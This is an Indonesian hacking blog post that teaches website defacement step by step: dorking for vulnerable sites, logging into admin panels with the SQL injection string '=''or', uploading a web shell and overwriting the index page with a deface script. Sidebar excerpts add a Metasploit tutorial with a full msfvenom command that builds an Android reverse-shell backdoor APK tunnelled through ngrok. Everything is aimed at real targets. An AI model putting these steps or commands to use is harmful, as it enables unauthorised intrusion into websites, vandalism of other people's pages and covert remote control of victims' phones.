Langsung ke konten utama

Deface Bypass Admin Upload Shell | Fresh Dork

Oleh


Nih gua jelasin Deface adalah suatu teknik mengganti atau menyisipkan file pada pada server, Teknik ini bisa di lakukan karena terdapat lubang atau celah pada system scurity yang ada pada website. Oleh karena itu gw tidak tanggung jawab atas semua yang lu lakukan :v

Nah udah tau penjelasanya yaudah kita langsung tutorialnya :


Bahan :

Dork : Sedot disini

Script deface bisa lu sedot disini

Shell backdoor bisa lu download disini

Untuk dorking berbagai negara disini

Dorking di google terus pilih salah satu site, di tahap ini membutuhkan kesabaran karena tidak semua site vuln cobalah terus mencari dengan mengembangkan dorknya .

bypass%2B1



Nah sekarang kita masuk di admin loginya, coba kita bypass dengan u/p '=''or'



Bypass%2B2


Kalo vuln maka akan masuk ke dashboard kalo tidak cari yang lain, nah sekarang gw udah masuk dashboard nih


Bypass%2B3


Sekarang tinggal upload shell nya, cari tempat upload terserah mau dimana sekarang gw nemu tempat upload di news.


Bypass%2B4


Akses shell nya ? cari tempat upload tadi terus cari gambar yang rusak lalu klik kanan pilih open image in a new tab.


Bypass%2B5



Dan bommm ! masuk ke shell nya :v


Bypass%2B6


Sekarang kita tinggal cari indexnya, caranya cari di public_html terus lu klik edit


Bypass%2B7


Copy script deface lu terus paste di tempat indexnya.


Bypass%2B8


Klik save ya :) 

Bypass%2B9


Tinggal akses dah site nya dan boomm terdeface :v


Bypass%2B10


Mudah kan ? :v
Nih tambahan kalo mau tebas indexnya jangan lupa backup ya hargai webmaster emang jadi webmaster itu mudah coeg :v

Thx you :*
Label:

Komentar

Posting Komentar

Postingan populer dari blog ini

Garuda Webscan | Simple Tool Information Gathering

Oleh
Hai bwank! Kali ini saya akan membagikan tool dari member Garuda Security Hacker yaitu Yoshieiciro_01. Oke langsung saja kita ke fitur fiturnya : 1) Services Scanner 2) Domain Name Server (DNS) Scanner 3) Subdomain Scanner 4) Hidden Files/Directories 5) Vulnerabilities Scanner Gud kan fiturnya? kuyy install lgsg coeg:v Cara install : 1. git clone  https://github.com/Yoshieichiro01/Garuda-WebScan.git 2. cd Garuda-WebScan 3. chmod 777 install.sh 4. chmod 777 Garuda-WebScan.sh 5. ./install.sh 6. ./Garuda-WebScan.sh 7. langsung sikatt Thanks To :  Garuda Security Hacker
Posting Komentar
Baca selengkapnya

Sadap Android Dengan Metasploit via Termux

Oleh
Yo bosku,gak usah banyak cek cok ya, dah capek abis kerja di real life (duh jd curhat) :v langsung  simak saja tutornya 😘 .Forwardingalian  sudah menginstall metasploit dan ngrok ya boss karna di sini kita butuh ngrok buat port forwarding,jika belum kalian bisa cari di google :v latau ain kali saya akan memposting di artikel selanjutnya. [pertama] aktifkan ngrokmu : ketik   ./ngrok tcp 1945  (1945 hanya contoh kalian bisa ganti sesuka hati) [kedua]  buat dulu backdoornya boss,buka termuxmu dan masuk di dir/folder mana kamu pengen nempatin backdoornya contoh : cd /sdcard/demo kemudian ketik :  msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=10637   R > backdoor.apk  ( 0.tcp.ngrok.io  isi dengan ip yg di ngrok, 10362  isi dengan port yang ada di ngrok) [next] [ketiga] jalankan metasploitmu kalo sudah terbuka ketik :  use exploit/multi/handler ketik :  set payload android/meterpreter/reverse_tcp ketik :  set Lhost localhost ketik :  set Lport
Posting Komentar
Baca selengkapnya